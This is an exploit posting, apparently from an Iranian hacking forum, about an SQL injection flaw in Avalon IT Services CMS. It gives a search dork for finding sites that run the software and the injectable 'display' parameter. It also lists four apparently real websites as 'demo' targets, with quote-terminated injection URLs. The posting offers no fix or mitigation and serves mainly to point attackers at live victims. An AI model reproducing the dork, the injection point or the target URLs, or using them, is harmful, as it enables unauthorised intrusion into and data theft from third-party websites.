################################################################################ # # Exploit Title : Avalon IT Services Cms Sql Injection Vulnerability # # Author : IrIsT.Ir # # Discovered By : Beni_Vanda # # Home : http://IrIsT.Ir/forum # # Software Link : http://www.avalonitservices.ca/ # # Security Risk : High # # Version : All Version # # Tested on : win7,BT,Ubunut,Fedora # # Dork : intext:"Web Design by Avalon IT Services" # ############################################################################################### # # Expl0iTs : # # http://target.com/default.php?display=[Sql] # # # D3mo : # # http://www.btyec.ca/default.php?display=modNews&do=viewNews&nid=93' # http://www.heartscontent.ca/default.php?display=modGallery&do=viewImage&iid=6' # http://www.woodenboatnl.com/default.php?display=modNews&do=viewNews&nid=33&pageNum=1' # http://www.sbdemo.newfoundlandwebhosting.ca/default.php?display=modGallery&do=viewImage&iid=134' # # ############################################################################################## # # Greats : Amir - B3HZ4D - C0dex - TaK.FaNaR - Dead.Zone - nimaarek - m3hdi - F@rid - dr.tofan # # and All Members In Www.IrIsT.Ir/forum # ##############################################################################################